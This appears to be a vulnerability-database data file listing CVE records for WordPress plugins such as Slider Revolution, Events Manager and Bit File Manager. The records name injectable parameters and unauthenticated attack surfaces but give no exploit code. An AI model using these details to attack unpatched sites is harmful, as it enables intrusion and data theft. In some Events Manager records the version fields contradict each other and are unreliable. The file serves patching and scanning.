{"CVE_ID":"CVE-2024-4637","slug":"revslider","versionImpact":"6.7.10","versionEndExcluding":"6.7.11","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.7.10 due to insufficient input sanitization and output escaping on the user supplied Elementor 'wrapperid' and 'zindex' display attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457b5066-da37-4877-9abe-c912bc201f29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457b5066-da37-4877-9abe-c912bc201f29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4581","slug":"revslider","versionImpact":"6.7.10","versionEndExcluding":"6.7.11","description":"The Slider Revolution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Add Layer widget in all versions up to, and including, 6.7.11 due to insufficient input sanitization and output escaping on the user supplied 'class', 'id', and 'title' attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Successful exploitation of this vulnerability requires an Administrator to give Slider Creation privileges to Author-level users.","recommendation":"Update to version 6.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99b8eb9-1511-4ec0-98f4-c0e0c989fa28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99b8eb9-1511-4ec0-98f4-c0e0c989fa28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.sliderrevolution.com\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1525","slug":"site-reviews","versionEndExcluding":"6.7.1","description":"The Site Reviews WordPress plugin before 6.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ae6bf90-b100-4bb5-bdd7-8acdbd950596\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ae6bf90-b100-4bb5-bdd7-8acdbd950596\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5596","slug":"armember","versionImpact":"6.7","versionEndExcluding":"6.7.1","description":"The ARMember Premium plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.7. This is due to incorrectly implemented nonce validation function on multiple functions. This makes it possible for unauthenticated attackers to modify, or delete user meta and plugin options which can lead to limited privilege escalation.","recommendation":"Update to version 6.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e55591e-c1e9-4667-b04f-4956d2f37d51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e55591e-c1e9-4667-b04f-4956d2f37d51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/armember-complete-wordpress-membership-system\\\/17785056\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/armember-complete-wordpress-membership-system\\\/17785056\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6842","slug":"formidable","versionImpact":"6.7","versionEndExcluding":"6.7.1","description":"The Formidable Forms \u2013 Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name field label and description field label parameter in all versions up to 6.7 (inclusive) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this only affects multi-site installations and installations where unfiltered_html has been disabled. However, in the formidable settings admins can extend form creation, deletion and other management permissions to other user types, which makes it possible for this vulnerability to be exploited by lower level user types as long as they have been granted the proper permissions.","recommendation":"Update to version 6.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47e402c3-e06c-4ac9-8c60-5666cb1101ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47e402c3-e06c-4ac9-8c60-5666cb1101ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6830","slug":"formidable","versionImpact":"6.7","versionEndExcluding":"6.7.1","description":"The Formidable Forms plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 6.7. This vulnerability allows unauthenticated users to inject arbitrary HTML code into form fields. When the form data is viewed by an administrator in the Entries View Page, the injected HTML code is rendered, potentially leading to admin area defacement or redirection to malicious websites.","recommendation":"Update to version 6.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff294b0f-97fe-4d27-bf93-f5bbb57ac1f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff294b0f-97fe-4d27-bf93-f5bbb57ac1f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3017166%40formidable%2Ftrunk&old=3009066%40formidable%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6205","slug":"payplus-payment-gateway","versionImpact":"6.6.8","versionEndExcluding":"6.6.9","description":"The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.","recommendation":"Update to version 6.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2c5032-2917-418c-aee3-092bdb78a087\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e2c5032-2917-418c-aee3-092bdb78a087\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-11638","slug":"gtbabel","versionImpact":"6.6.8","versionEndExcluding":"6.6.9","description":"The Gtbabel WordPress plugin before 6.6.9 does not ensure that the URL to perform code analysis upon belongs to the blog, which could allow unauthenticated attackers to retrieve a logged-in user's (such as admin) cookies by making them open a crafted URL, as the request made to analyse the URL contains such cookies.","recommendation":"Update to version 6.6.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f20336f-e12e-4b09-bcaf-45f7249f6495\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f20336f-e12e-4b09-bcaf-45f7249f6495\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6976","slug":"events-manager","versionImpact":"7.0.3","versionEndExcluding":"6.6.5","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to one of the following versions, or a newer patched version: 6.6.5, 7.0.4","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L485\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-events.php#L485\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-locations.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da97a395-64b8-4efd-b189-f917674b1c18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da97a395-64b8-4efd-b189-f917674b1c18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6975","slug":"events-manager","versionImpact":"7.0.3","versionEndExcluding":"6.6.5","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018calendar_header\u2019 parameter in all versions up to, and including, 7.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to one of the following versions, or a newer patched version: 6.6.5, 7.0.4","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/templates\\\/calendar\\\/section-header-navigation.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/templates\\\/calendar\\\/section-header-navigation.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e3e59b-837b-4058-b7bc-a22cff22afb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6e3e59b-837b-4058-b7bc-a22cff22afb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6970","slug":"events-manager","versionImpact":"7.0.3","versionEndExcluding":"6.6.5","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to one of the following versions, or a newer patched version: 6.6.5, 7.0.4","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-object.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/7.0.3\\\/classes\\\/em-object.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3321403\\\/events-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7320c06e-a7a7-4ed0-93cd-e85d74bae73f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7320c06e-a7a7-4ed0-93cd-e85d74bae73f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8275","slug":"the-events-calendar","versionImpact":"6.6.4","versionEndExcluding":"6.6.4.1","description":"The The Events Calendar plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'tribe_has_next_event' function in all versions up to, and including, 6.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Only sites that have manually added tribe_has_next_event() will be vulnerable to this SQL injection.","recommendation":"Update to version 6.6.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59891c7-db1a-4688-8616-8877d7d7960d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f59891c7-db1a-4688-8616-8877d7d7960d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/theeventscalendar.com\\\/knowledgebase\\\/customizing-template-files-2-legacy\\\/\",\"name\":\"https:\\\/\\\/theeventscalendar.com\\\/knowledgebase\\\/customizing-template-files-2-legacy\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.theeventscalendar.com\\\/reference\\\/functions\\\/tribe_has_next_event\\\/\",\"name\":\"https:\\\/\\\/docs.theeventscalendar.com\\\/reference\\\/functions\\\/tribe_has_next_event\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152853%40the-events-calendar&new=3152853%40the-events-calendar&sfp_email=&sfph_mail=#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152853%40the-events-calendar&new=3152853%40the-events-calendar&sfp_email=&sfph_mail=#file18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8493","slug":"the-events-calendar","versionImpact":"6.6.3","versionEndExcluding":"6.6.4","description":"The Events Calendar WordPress plugin before 6.6.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/561b3185-501a-4a75-b880-226b159c0431\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/561b3185-501a-4a75-b880-226b159c0431\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11260","slug":"events-manager","versionImpact":"6.6.3","versionEndExcluding":"6.6.4","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the active_status parameter in all versions up to, and including, 6.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/6.6.3\\\/classes\\\/em-events.php#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/events-manager\\\/tags\\\/6.6.3\\\/classes\\\/em-events.php#L606\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925402a5-e203-4976-b0a9-88c974b540b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/925402a5-e203-4976-b0a9-88c974b540b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6528","slug":"revslider","versionEndExcluding":"6.6.19","description":"The Slider Revolution WordPress plugin before 6.6.19 does not prevent users with at least the Author role from unserializing arbitrary content when importing sliders, potentially leading to Remote Code Execution.","recommendation":"Update to version 6.6.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36ced447-84ea-4162-80d2-6df226cb53cb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36ced447-84ea-4162-80d2-6df226cb53cb\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4621","slug":"arforms","versionImpact":"6.5","versionEndExcluding":"6.6","description":"The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33a366d9-6c81-4957-a101-768487aae735\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33a366d9-6c81-4957-a101-768487aae735\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4620","slug":"arforms","versionImpact":"6.5","versionEndExcluding":"6.6","description":"The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.6 allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form","recommendation":"Update to version 6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc34dc2d-d5a1-4e28-8507-33f659ead647\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dc34dc2d-d5a1-4e28-8507-33f659ead647\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8617","slug":"quiz-maker","versionImpact":"6.5.9.8","versionEndExcluding":"6.5.9.9","description":"The Quiz Maker WordPress plugin before 6.5.9.9 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.5.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba6b6b82-6f21-45ff-bd64-685ea8ae1b82\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba6b6b82-6f21-45ff-bd64-685ea8ae1b82\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8743","slug":"file-manager","versionImpact":"6.5.7","versionEndExcluding":"6.5.8","description":"The Bit File Manager \u2013 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to Limited JavaScript File Upload in all versions up to, and including, 6.5.7. This is due to a lack of proper checks on allowed file types. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an administrator, to upload .css and .js files, which could lead to Stored Cross-Site Scripting.","recommendation":"Update to version 6.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314520d5-bd9d-46c1-b903-5e5cb3bb3417?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314520d5-bd9d-46c1-b903-5e5cb3bb3417?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161219\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161219\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4323","slug":"google-analyticator","versionEndExcluding":"6.5.6","description":"The Analyticator WordPress plugin before 6.5.6 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce8027b8-9473-463e-ba80-49b3d6d16228\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce8027b8-9473-463e-ba80-49b3d6d16228\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3425","slug":"google-analyticator","versionEndExcluding":"6.5.6","description":"The Analyticator WordPress plugin before 6.5.6 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df1c36bb-9861-4272-89c9-ae76e62f687c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df1c36bb-9861-4272-89c9-ae76e62f687c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7627","slug":"file-manager","versionImpact":"6.5.5","versionEndExcluding":"6.5.6","description":"The Bit File Manager plugin for WordPress is vulnerable to Remote Code Execution in versions 6.0 to 6.5.5 via the 'checkSyntax' function. This is due to writing a temporary file to a publicly accessible directory before performing file validation. This makes it possible for unauthenticated attackers to execute code on the server if an administrator has allowed Guest User read permissions.","recommendation":"Update to version 6.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f29de7a-3f15-4b6d-aad7-6a08151e2113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f29de7a-3f15-4b6d-aad7-6a08151e2113?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Providers\\\/FileEditValidator.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7770","slug":"file-manager","versionImpact":"6.5.5","versionEndExcluding":"6.5.6","description":"The Bit File Manager \u2013 100% Free & Open Source File Manager and Code Editor for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 6.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted upload permissions by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 6.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cae7702-e531-45b9-9131-42edbc073a07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cae7702-e531-45b9-9131-42edbc073a07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/backend\\\/app\\\/Http\\\/Controllers\\\/FileManagerController.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinderConnector.class.php#L160\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinderConnector.class.php#L160\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L1210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L1210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L3257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager\\\/trunk\\\/libs\\\/elFinder\\\/php\\\/elFinder.class.php#L3257\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138710\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6498","slug":"complianz-gdpr","versionEndExcluding":"6.5.6","description":"The Complianz \u2013 GDPR\/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 6.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01c1458d-3e38-4dbf-bb65-80465ea6d0ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01c1458d-3e38-4dbf-bb65-80465ea6d0ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009228%40complianz-gdpr&new=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009228%40complianz-gdpr&new=3009228%40complianz-gdpr&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
